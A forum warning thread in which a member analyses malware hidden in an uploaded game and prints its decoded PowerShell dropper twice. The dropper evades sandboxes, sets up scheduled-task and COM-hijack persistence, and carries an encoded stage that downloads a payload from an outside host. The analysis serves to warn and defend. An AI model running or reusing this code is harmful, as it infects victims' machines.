PSA: Malware detected from member's upload
- Thread starter Checkmate
- Start date
I have something to report from leo0083,Today I downloaded a game called ~KIH~ 【081411】[Ero Games][ALL-TiME] Time Enclosure from him. And
The surprising thing was that when I scanned for viruses, it looked like this. Link game:https://www.anime-sharing.com/threads/kih-【081411】-エロゲーム-all-time-時間封鎖.1577387/
The surprising thing was that when I scanned for viruses, it looked like this. Link game:https://www.anime-sharing.com/threads/kih-【081411】-エロゲーム-all-time-時間封鎖.1577387/
MrGuiW
New member
- Jan 8, 2026
- 28
- 27
I've made a huge discovery while reverse engineering the malware files with the help of AI + tools, my post on f95, i will also post here shortly.
- Oct 16, 2010
- 7,582
- 22
- 12,732
Please make a report, f95 closed public access to the malware thread
MrGuiW
New member
- Jan 8, 2026
- 28
- 27
My post on f95:
HUGE UPDATE:
With the help of AI and some reverse engineering tools, i've managed to reverse engineer the malware inside the .ogg file and decode it, i've analysed the first part of the malware, theres a second part involving a downloaded infected .jpg file from a website which i will post later if i manage to decode it.
*update: i will post more screenshots showing the details.
PART 1 (Game.exe and Scene2.ogg):
I will use several AI promps which will help to understand what this malware is doing and how we decoded it.
Here is the first part:
Game.exe Post (First part of the malware, sideloads Scene2.ogg as DLL)
then
Scene2.ogg:
Sandboxie detection:
After trial and error, finding functions and what encryption this string was using, i got the powershell script that executes after running the game.
Will continue in next post because of attachment limit..
HUGE UPDATE:
With the help of AI and some reverse engineering tools, i've managed to reverse engineer the malware inside the .ogg file and decode it, i've analysed the first part of the malware, theres a second part involving a downloaded infected .jpg file from a website which i will post later if i manage to decode it.
*update: i will post more screenshots showing the details.
PART 1 (Game.exe and Scene2.ogg):
I will use several AI promps which will help to understand what this malware is doing and how we decoded it.
Here is the first part:
Game.exe Post (First part of the malware, sideloads Scene2.ogg as DLL)
then
Scene2.ogg:
Sandboxie detection:
After trial and error, finding functions and what encryption this string was using, i got the powershell script that executes after running the game.
Will continue in next post because of attachment limit..
Last edited:
MrGuiW
New member
- Jan 8, 2026
- 28
- 27
The encryption used was Base64-encoded UTF-16LE, after decoding we got this:
$ErrorActionPreference = "SilentlyContinue"
$ser = Get-Service -Name "SbieSvc" -ErrorAction SilentlyContinue
if ($ser) {return}
$proc = Get-Process -Name "Procmon64" -ErrorAction SilentlyContinue
if ($proc) { return }
$path = "C:\Program Files\Sandboxie"
if (-Not (Test-Path $path)) {
$d2 = ".dll"
$letras = "abcdefghijklmnopqrstuvwxyz"
$rnd = New-Object System.Random
function New-RandomString($len) {
$sb = New-Object System.Text.StringBuilder $len
for ($i = 0; $i -lt $len; $i++) {
$index = $rnd.Next(0, $letras.Length)
[void]$sb.Append($letras[$index])
}
return $sb.ToString()
}
$palabra1 = (New-RandomString 6) + $d2
$palabra2 = (New-RandomString 6) + $d2
$appDataLocal = [Environment]::GetFolderPath([Environment+SpecialFolder]::LocalApplicationData)
$subcarpetas = Get-ChildItem $appDataLocal -Directory | Select-Object -ExpandProperty FullName
$folderPath = $subcarpetas[$rnd.Next(0, $subcarpetas.Count)]
$folderPath2 = $subcarpetas[$rnd.Next(0, $subcarpetas.Count)]
$folderPath3 = $subcarpetas[$rnd.Next(0, $subcarpetas.Count)]
$hist = "History"
function Get-RandomFolder {
do {
$p = $subcarpetas[$rnd.Next(0, $subcarpetas.Count)]
} while ($p.Contains(" ") -or $p.Contains("History"))
return $p
}
$folderPath = Get-RandomFolder
$folderPath2 = Get-RandomFolder
$folderPath3 = Get-RandomFolder
$rt2 = 'SOFTWARE\Classes\CLSID\{B210D694-C8DF-490D-9576-9E20CDBC20BD}'
try {
$baseKey = [Microsoft.Win32.RegistryKey]::OpenBaseKey(
[Microsoft.Win32.RegistryHive]::CurrentUser,
[Microsoft.Win32.RegistryView]::Registry64
)
$text5 = [System.IO.Path]::Combine($folderPath2, $palabra1)
$key2 = $baseKey.OpenSubKey($rt2)
if ($key2 -ne $null) { return }
$UTEXT ="DQAKACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAIgBTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlACIADQAKACQAeQAgAD0AIAAoAEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAiAEgASwBDAFUAOgBcAEUAbgB2AGkAcgBvAG4AbQBlAG4AdAAiACkALgBNAEkAXwBWADIADQAKACQAbwAgAD0AIAAkAHkADQAKACQAZgAgAD0AIAAoAFMAcABsAGkAdAAtAFAAYQB0AGgAIAAkAHkAIAAtAFAAYQByAGUAbgB0ACkAIAArACAAJwBcACcADQAKACQAaQA9AEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABmACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACIAcwBlAHQAdABpAG4AZwBzAC4AZABhAHQAIgANAAoAJABpADIAPQBKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAiADEALgBiAGEAawAiAA0ACgAkAGEAcgBnACAAPQAgACIALwB0AHIAYQBuAHMAZgBlAHIAIgAsACIAbQBkACIALAAiAGgAdAB0AHAAcwA6AC8ALwBtAGcAegAuAGcAcgBlAGEAdAAtAHMAaQB0AGUALgBuAGUAdAAvAHoAYQBlAHMAZAAuAGoAcABnACIALAAkAGkAMgANAAoADQAKACQAcAByACAAPQAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACIAYgBpAHQAcwBhAGQAbQBpAG4ALgBlAHgAZQAiACAAYAAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAALQBBAHIAZwB1AG0AZQBuAHQATABpAHMAdAAgACQAYQByAGcAIABgAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAtAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQAgAEgAaQBkAGQAZQBuACAAYAAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAALQBXAGEAaQB0ACAAYAAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAALQBQAGEAcwBzAFQAaAByAHUAIABgAAoADQAKAFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AUwBlAGMAbwBuAGQAcwAgADMAMAANAAoAQwBvAHAAeQAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAkAGkAMgAgAC0ARABlAHMAdABpAG4AYQB0AGkAbwBuACAAJABpAA0ACgBSAGUAbQBvAHYAZQAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAkAGkAMgANAAoAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMQANAAoAJABhAD0AWwBTAHkAcwB0AGUAbQAuAFMAZQBjAHUAcgBpAHQAeQAuAEMAcgB5AHAAdABvAGcAcgBhAHAAaAB5AC4AQQBlAHMAXQA6ADoAQwByAGUAYQB0AGUAKAApAA0ACgAkAGEALgBLAGUAeQA9AFsAVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAQgB5AHQAZQBzACgAIgB6AGIAYwBkADEAagA5ADIAMwA0AHIANgA3ADAAZQBoACIAKQANAAoAJABhAC4ASQBWAD0AJABhAC4ASwBlAHkADQAKACQAYQAuAE0AbwBkAGUAPQBbAFMAeQBzAHQAZQBtAC4AUwBlAGMAdQByAGkAdAB5AC4AQwByAHkAcAB0AG8AZwByAGEAcABoAHkALgBDAGkAcABoAGUAcgBNAG8AZABlAF0AOgA6AEMAQgBDAA0ACgAkAGQAPQAkAGEALgBDAHIAZQBhAHQAZQBEAGUAYwByAHkAcAB0AG8AcgAoACkADQAKACQAZQA9AFsASQBPAC4ARgBpAGwAZQBdADoAOgBSAGUAYQBkAEEAbABsAEIAeQB0AGUAcwAoACQAaQApAA0ACgAkAGQAcwA9ACQAZAAuAFQAcgBhAG4AcwBmAG8AcgBtAEYAaQBuAGEAbABCAGwAbwBjAGsAKAAkAGUALAAwACwAJABlAC4ATABlAG4AZwB0AGgAKQANAAoADQAKACQAcgBuAGcAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFMAZQBjAHUAcgBpAHQAeQAuAEMAcgB5AHAAdABvAGcAcgBhAHAAaAB5AC4AUgBhAG4AZABvAG0ATgB1AG0AYgBlAHIARwBlAG4AZQByAGEAdABvAHIAXQA6ADoAQwByAGUAYQB0AGUAKAApAA0ACgAkAHIAYQBuAGQAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAGIAeQB0AGUAWwBdACAAMgANAAoAJAByAG4AZwAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcgBhAG4AZAApAA0ACgANAAoAJABkAHMAWwAkAGQAcwAuAEwAZQBuAGcAdABoACAALQAgADIAXQAgAD0AIAAkAHIAYQBuAGQAWwAwAF0ADQAKACQAZABzAFsAJABkAHMALgBMAGUAbgBnAHQAaAAgAC0AIAAxAF0AIAA9ACAAJAByAGEAbgBkAFsAMQBdAA0ACgANAAoAWwBJAE8ALgBGAGkAbABlAF0AOgA6AFcAcgBpAHQAZQBBAGwAbABCAHkAdABlAHMAKAAkAG8ALAAkAGQAcwApAA0ACgANAAoAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABpAA0ACgAkAGMAIAA9ACAAIgB7AEIAMgAxADAARAA2ADkANAAtAEMAOABEAEYALQA0ADkAMABEAC0AOQA1ADcANgAtADkARQAyADAAQwBEAEIAQwAyADAAQgBEAH0AIgANAAoAJABwADIAIAA9ACAAIgBIAEsAQwBVADoAXABTAE8ARgBUAFcAQQBSAEUAXABDAGwAYQBzAHMAZQBzAFwAQwBMAFMASQBEAFwAJABjAFwASQBuAHAAcgBvAGMAUwBlAHIAdgBlAHIAMwAyACIACgBOAGUAdwAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAkAHAAMgAgAC0ASQB0AGUAbQBUAHkAcABlACAARABpAHIAZQBjAHQAbwByAHkAIAAtAEYAbwByAGMAZQAgAC0ARQByAHIAbwByAEEAYwB0AGkAbwBuACAAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQAgAHwAIABPAHUAdAAtAE4AdQBsAGwADQAKAFMAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAiAEgASwBDAFUAOgBcAFMATwBGAFQAVwBBAFIARQBcAEMAbABhAHMAcwBlAHMAXABDAEwAUwBJAEQAXAAkAGMAXABJAG4AcAByAG8AYwBTAGUAcgB2AGUAcgAzADIAIgAgAC0ATgBhAG0AZQAgACIAKABEAGUAZgBhAHUAbAB0ACkAIgAgAC0AVgBhAGwAdQBlACAAJABvACAALQBUAHkAcABlACAAUwB0AHIAaQBuAGcADQAKAA0ACgAkAGMAIAA9ACAAIgB7AEQARABBAEYAQQBFAEEAMgAtADgAOAA0ADIALQA0AEUAOQA2AC0AQgBBAEQARQAtAEQANAA0AEEAOABEADYANwA2AEYARABCAH0AIgANAAoAJABwADMAIAA9ACAAIgBIAEsAQwBVADoAXABTAE8ARgBUAFcAQQBSAEUAXABDAGwAYQBzAHMAZQBzAFwAQwBMAFMASQBEAFwAJABjAFwASQBuAHAAcgBvAGMAUwBlAHIAdgBlAHIAMwAyACIACgBOAGUAdwAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAkAHAAMwAgAC0ASQB0AGUAbQBUAHkAcABlACAARABpAHIAZQBjAHQAbwByAHkAIAAtAEYAbwByAGMAZQAgAC0ARQByAHIAbwByAEEAYwB0AGkAbwBuACAAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQAgAHwAIABPAHUAdAAtAE4AdQBsAGwADQAKAFMAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAiAEgASwBDAFUAOgBcAFMATwBGAFQAVwBBAFIARQBcAEMAbABhAHMAcwBlAHMAXABDAEwAUwBJAEQAXAAkAGMAXABJAG4AcAByAG8AYwBTAGUAcgB2AGUAcgAzADIAIgAgAC0ATgBhAG0AZQAgACIAKABEAGUAZgBhAHUAbAB0ACkAIgAgAC0AVgBhAGwAdQBlACAAJABvACAALQBUAHkAcABlACAAUwB0AHIAaQBuAGcADQAKAA0ACgBSAGUAbQBvAHYAZQAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBQAGEAdABoACAAIgBIAEsAQwBVADoAXABFAG4AdgBpAHIAbwBuAG0AZQBuAHQAIgAgAC0ATgBhAG0AZQAgACIATQBJAF8AVgAiACAALQBFAHIAcgBvAHIAQQBjAHQAaQBvAG4AIABTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlACAAfAAgAE8AdQB0AC0ATgB1AGwAbAANAAoAUgBlAG0AbwB2AGUALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgAC0AUABhAHQAaAAgACIASABLAEMAVQA6AFwARQBuAHYAaQByAG8AbgBtAGUAbgB0ACIAIAAtAE4AYQBtAGUAIAAiAE0ASQBfAFYAMgAiACAALQBFAHIAcgBvAHIAQQBjAHQAaQBvAG4AIABTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlACAAfAAgAE8AdQB0AC0ATgB1AGwAbAANAAoAVQBuAHIAZQBnAGkAcwB0AGUAcgAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAIAAtAFQAYQBzAGsATgBhAG0AZQAgACIAdQBwAGQAYQB0AGUALQBzAHkAcwB0AGEAcwBrACIAIAAtAEMAbwBuAGYAaQByAG0AOgAkAGYAYQBsAHMAZQAgAC0ARQByAHIAbwByAEEAYwB0AGkAbwBuACAAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQAgAHwAIABPAHUAdAAtAE4AdQBsAGwADQAKAA0ACgAkAGEAcgBnACAAPQAgACIALwBTACIALAAiAC8AQwAiACwAIgB7AEIAMgAxADAARAA2ADkANAAtAEMAOABEAEYALQA0ADkAMABEAC0AOQA1ADcANgAtADkARQAyADAAQwBEAEIAQwAyADAAQgBEAH0AIgANAAoADQAKACQAcAByACAAPQAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACIAdgBlAHIAYwBsAHMAaQBkAC4AZQB4AGUAIgAgAGAACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIAAkAGEAcgBnACAAYAAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgBgAA0ACgANAAoA"
$envKey = 'HKCU:\Environment'
$myvar = 'MI_V'
$myvar2 = 'MI_V2'
if (Test-Path $envKey) {
Set-ItemProperty -Path $envKey -Name $myvar -Value $UTEXT -Type String
Set-ItemProperty -Path $envKey -Name $myvar2 -Value $text5 -Type String
}
$key2.Close()
$baseKey.Close()
}
catch {
}
$ups="update-systask"
$arg1 = "cmd.exe /c start '' /b powershell -NoProfile -WindowStyle Hidden -EncodedCommand %MI_V%";
$f1 = (Get-Date).AddDays(1)
$f1Str = $f1.ToString("dd/MM/yyyy", [System.Globalization.CultureInfo]::InvariantCulture)
$hStr = $f1.ToString("HH:mm", [System.Globalization.CultureInfo]::InvariantCulture)
$argts = "/create /f /sc once /st $hStr /sd $f1Str /tn `"$ups`" /tr `"$arg1`""
$psi = New-Object System.Diagnostics.ProcessStartInfo
$psi.FileName = "schtasks"
$psi.Arguments = $argts
$psi.UseShellExecute = $false
$psi.CreateNoWindow = $true
$p5 = [System.Diagnostics.Process]::Start($psi)
$p5.WaitForExit()
}
$ser = Get-Service -Name "SbieSvc" -ErrorAction SilentlyContinue
if ($ser) {return}
$proc = Get-Process -Name "Procmon64" -ErrorAction SilentlyContinue
if ($proc) { return }
$path = "C:\Program Files\Sandboxie"
if (-Not (Test-Path $path)) {
$d2 = ".dll"
$letras = "abcdefghijklmnopqrstuvwxyz"
$rnd = New-Object System.Random
function New-RandomString($len) {
$sb = New-Object System.Text.StringBuilder $len
for ($i = 0; $i -lt $len; $i++) {
$index = $rnd.Next(0, $letras.Length)
[void]$sb.Append($letras[$index])
}
return $sb.ToString()
}
$palabra1 = (New-RandomString 6) + $d2
$palabra2 = (New-RandomString 6) + $d2
$appDataLocal = [Environment]::GetFolderPath([Environment+SpecialFolder]::LocalApplicationData)
$subcarpetas = Get-ChildItem $appDataLocal -Directory | Select-Object -ExpandProperty FullName
$folderPath = $subcarpetas[$rnd.Next(0, $subcarpetas.Count)]
$folderPath2 = $subcarpetas[$rnd.Next(0, $subcarpetas.Count)]
$folderPath3 = $subcarpetas[$rnd.Next(0, $subcarpetas.Count)]
$hist = "History"
function Get-RandomFolder {
do {
$p = $subcarpetas[$rnd.Next(0, $subcarpetas.Count)]
} while ($p.Contains(" ") -or $p.Contains("History"))
return $p
}
$folderPath = Get-RandomFolder
$folderPath2 = Get-RandomFolder
$folderPath3 = Get-RandomFolder
$rt2 = 'SOFTWARE\Classes\CLSID\{B210D694-C8DF-490D-9576-9E20CDBC20BD}'
try {
$baseKey = [Microsoft.Win32.RegistryKey]::OpenBaseKey(
[Microsoft.Win32.RegistryHive]::CurrentUser,
[Microsoft.Win32.RegistryView]::Registry64
)
$text5 = [System.IO.Path]::Combine($folderPath2, $palabra1)
$key2 = $baseKey.OpenSubKey($rt2)
if ($key2 -ne $null) { return }
$UTEXT ="DQAKACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAIgBTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlACIADQAKACQAeQAgAD0AIAAoAEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAiAEgASwBDAFUAOgBcAEUAbgB2AGkAcgBvAG4AbQBlAG4AdAAiACkALgBNAEkAXwBWADIADQAKACQAbwAgAD0AIAAkAHkADQAKACQAZgAgAD0AIAAoAFMAcABsAGkAdAAtAFAAYQB0AGgAIAAkAHkAIAAtAFAAYQByAGUAbgB0ACkAIAArACAAJwBcACcADQAKACQAaQA9AEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABmACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACIAcwBlAHQAdABpAG4AZwBzAC4AZABhAHQAIgANAAoAJABpADIAPQBKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAiADEALgBiAGEAawAiAA0ACgAkAGEAcgBnACAAPQAgACIALwB0AHIAYQBuAHMAZgBlAHIAIgAsACIAbQBkACIALAAiAGgAdAB0AHAAcwA6AC8ALwBtAGcAegAuAGcAcgBlAGEAdAAtAHMAaQB0AGUALgBuAGUAdAAvAHoAYQBlAHMAZAAuAGoAcABnACIALAAkAGkAMgANAAoADQAKACQAcAByACAAPQAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACIAYgBpAHQAcwBhAGQAbQBpAG4ALgBlAHgAZQAiACAAYAAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAALQBBAHIAZwB1AG0AZQBuAHQATABpAHMAdAAgACQAYQByAGcAIABgAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAtAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQAgAEgAaQBkAGQAZQBuACAAYAAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAALQBXAGEAaQB0ACAAYAAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAALQBQAGEAcwBzAFQAaAByAHUAIABgAAoADQAKAFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AUwBlAGMAbwBuAGQAcwAgADMAMAANAAoAQwBvAHAAeQAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAkAGkAMgAgAC0ARABlAHMAdABpAG4AYQB0AGkAbwBuACAAJABpAA0ACgBSAGUAbQBvAHYAZQAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAkAGkAMgANAAoAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMQANAAoAJABhAD0AWwBTAHkAcwB0AGUAbQAuAFMAZQBjAHUAcgBpAHQAeQAuAEMAcgB5AHAAdABvAGcAcgBhAHAAaAB5AC4AQQBlAHMAXQA6ADoAQwByAGUAYQB0AGUAKAApAA0ACgAkAGEALgBLAGUAeQA9AFsAVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAQgB5AHQAZQBzACgAIgB6AGIAYwBkADEAagA5ADIAMwA0AHIANgA3ADAAZQBoACIAKQANAAoAJABhAC4ASQBWAD0AJABhAC4ASwBlAHkADQAKACQAYQAuAE0AbwBkAGUAPQBbAFMAeQBzAHQAZQBtAC4AUwBlAGMAdQByAGkAdAB5AC4AQwByAHkAcAB0AG8AZwByAGEAcABoAHkALgBDAGkAcABoAGUAcgBNAG8AZABlAF0AOgA6AEMAQgBDAA0ACgAkAGQAPQAkAGEALgBDAHIAZQBhAHQAZQBEAGUAYwByAHkAcAB0AG8AcgAoACkADQAKACQAZQA9AFsASQBPAC4ARgBpAGwAZQBdADoAOgBSAGUAYQBkAEEAbABsAEIAeQB0AGUAcwAoACQAaQApAA0ACgAkAGQAcwA9ACQAZAAuAFQAcgBhAG4AcwBmAG8AcgBtAEYAaQBuAGEAbABCAGwAbwBjAGsAKAAkAGUALAAwACwAJABlAC4ATABlAG4AZwB0AGgAKQANAAoADQAKACQAcgBuAGcAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFMAZQBjAHUAcgBpAHQAeQAuAEMAcgB5AHAAdABvAGcAcgBhAHAAaAB5AC4AUgBhAG4AZABvAG0ATgB1AG0AYgBlAHIARwBlAG4AZQByAGEAdABvAHIAXQA6ADoAQwByAGUAYQB0AGUAKAApAA0ACgAkAHIAYQBuAGQAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAGIAeQB0AGUAWwBdACAAMgANAAoAJAByAG4AZwAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcgBhAG4AZAApAA0ACgANAAoAJABkAHMAWwAkAGQAcwAuAEwAZQBuAGcAdABoACAALQAgADIAXQAgAD0AIAAkAHIAYQBuAGQAWwAwAF0ADQAKACQAZABzAFsAJABkAHMALgBMAGUAbgBnAHQAaAAgAC0AIAAxAF0AIAA9ACAAJAByAGEAbgBkAFsAMQBdAA0ACgANAAoAWwBJAE8ALgBGAGkAbABlAF0AOgA6AFcAcgBpAHQAZQBBAGwAbABCAHkAdABlAHMAKAAkAG8ALAAkAGQAcwApAA0ACgANAAoAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABpAA0ACgAkAGMAIAA9ACAAIgB7AEIAMgAxADAARAA2ADkANAAtAEMAOABEAEYALQA0ADkAMABEAC0AOQA1ADcANgAtADkARQAyADAAQwBEAEIAQwAyADAAQgBEAH0AIgANAAoAJABwADIAIAA9ACAAIgBIAEsAQwBVADoAXABTAE8ARgBUAFcAQQBSAEUAXABDAGwAYQBzAHMAZQBzAFwAQwBMAFMASQBEAFwAJABjAFwASQBuAHAAcgBvAGMAUwBlAHIAdgBlAHIAMwAyACIACgBOAGUAdwAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAkAHAAMgAgAC0ASQB0AGUAbQBUAHkAcABlACAARABpAHIAZQBjAHQAbwByAHkAIAAtAEYAbwByAGMAZQAgAC0ARQByAHIAbwByAEEAYwB0AGkAbwBuACAAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQAgAHwAIABPAHUAdAAtAE4AdQBsAGwADQAKAFMAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAiAEgASwBDAFUAOgBcAFMATwBGAFQAVwBBAFIARQBcAEMAbABhAHMAcwBlAHMAXABDAEwAUwBJAEQAXAAkAGMAXABJAG4AcAByAG8AYwBTAGUAcgB2AGUAcgAzADIAIgAgAC0ATgBhAG0AZQAgACIAKABEAGUAZgBhAHUAbAB0ACkAIgAgAC0AVgBhAGwAdQBlACAAJABvACAALQBUAHkAcABlACAAUwB0AHIAaQBuAGcADQAKAA0ACgAkAGMAIAA9ACAAIgB7AEQARABBAEYAQQBFAEEAMgAtADgAOAA0ADIALQA0AEUAOQA2AC0AQgBBAEQARQAtAEQANAA0AEEAOABEADYANwA2AEYARABCAH0AIgANAAoAJABwADMAIAA9ACAAIgBIAEsAQwBVADoAXABTAE8ARgBUAFcAQQBSAEUAXABDAGwAYQBzAHMAZQBzAFwAQwBMAFMASQBEAFwAJABjAFwASQBuAHAAcgBvAGMAUwBlAHIAdgBlAHIAMwAyACIACgBOAGUAdwAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAkAHAAMwAgAC0ASQB0AGUAbQBUAHkAcABlACAARABpAHIAZQBjAHQAbwByAHkAIAAtAEYAbwByAGMAZQAgAC0ARQByAHIAbwByAEEAYwB0AGkAbwBuACAAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQAgAHwAIABPAHUAdAAtAE4AdQBsAGwADQAKAFMAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAiAEgASwBDAFUAOgBcAFMATwBGAFQAVwBBAFIARQBcAEMAbABhAHMAcwBlAHMAXABDAEwAUwBJAEQAXAAkAGMAXABJAG4AcAByAG8AYwBTAGUAcgB2AGUAcgAzADIAIgAgAC0ATgBhAG0AZQAgACIAKABEAGUAZgBhAHUAbAB0ACkAIgAgAC0AVgBhAGwAdQBlACAAJABvACAALQBUAHkAcABlACAAUwB0AHIAaQBuAGcADQAKAA0ACgBSAGUAbQBvAHYAZQAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBQAGEAdABoACAAIgBIAEsAQwBVADoAXABFAG4AdgBpAHIAbwBuAG0AZQBuAHQAIgAgAC0ATgBhAG0AZQAgACIATQBJAF8AVgAiACAALQBFAHIAcgBvAHIAQQBjAHQAaQBvAG4AIABTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlACAAfAAgAE8AdQB0AC0ATgB1AGwAbAANAAoAUgBlAG0AbwB2AGUALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgAC0AUABhAHQAaAAgACIASABLAEMAVQA6AFwARQBuAHYAaQByAG8AbgBtAGUAbgB0ACIAIAAtAE4AYQBtAGUAIAAiAE0ASQBfAFYAMgAiACAALQBFAHIAcgBvAHIAQQBjAHQAaQBvAG4AIABTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlACAAfAAgAE8AdQB0AC0ATgB1AGwAbAANAAoAVQBuAHIAZQBnAGkAcwB0AGUAcgAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAIAAtAFQAYQBzAGsATgBhAG0AZQAgACIAdQBwAGQAYQB0AGUALQBzAHkAcwB0AGEAcwBrACIAIAAtAEMAbwBuAGYAaQByAG0AOgAkAGYAYQBsAHMAZQAgAC0ARQByAHIAbwByAEEAYwB0AGkAbwBuACAAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQAgAHwAIABPAHUAdAAtAE4AdQBsAGwADQAKAA0ACgAkAGEAcgBnACAAPQAgACIALwBTACIALAAiAC8AQwAiACwAIgB7AEIAMgAxADAARAA2ADkANAAtAEMAOABEAEYALQA0ADkAMABEAC0AOQA1ADcANgAtADkARQAyADAAQwBEAEIAQwAyADAAQgBEAH0AIgANAAoADQAKACQAcAByACAAPQAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACIAdgBlAHIAYwBsAHMAaQBkAC4AZQB4AGUAIgAgAGAACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIAAkAGEAcgBnACAAYAAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgBgAA0ACgANAAoA"
$envKey = 'HKCU:\Environment'
$myvar = 'MI_V'
$myvar2 = 'MI_V2'
if (Test-Path $envKey) {
Set-ItemProperty -Path $envKey -Name $myvar -Value $UTEXT -Type String
Set-ItemProperty -Path $envKey -Name $myvar2 -Value $text5 -Type String
}
$key2.Close()
$baseKey.Close()
}
catch {
}
$ups="update-systask"
$arg1 = "cmd.exe /c start '' /b powershell -NoProfile -WindowStyle Hidden -EncodedCommand %MI_V%";
$f1 = (Get-Date).AddDays(1)
$f1Str = $f1.ToString("dd/MM/yyyy", [System.Globalization.CultureInfo]::InvariantCulture)
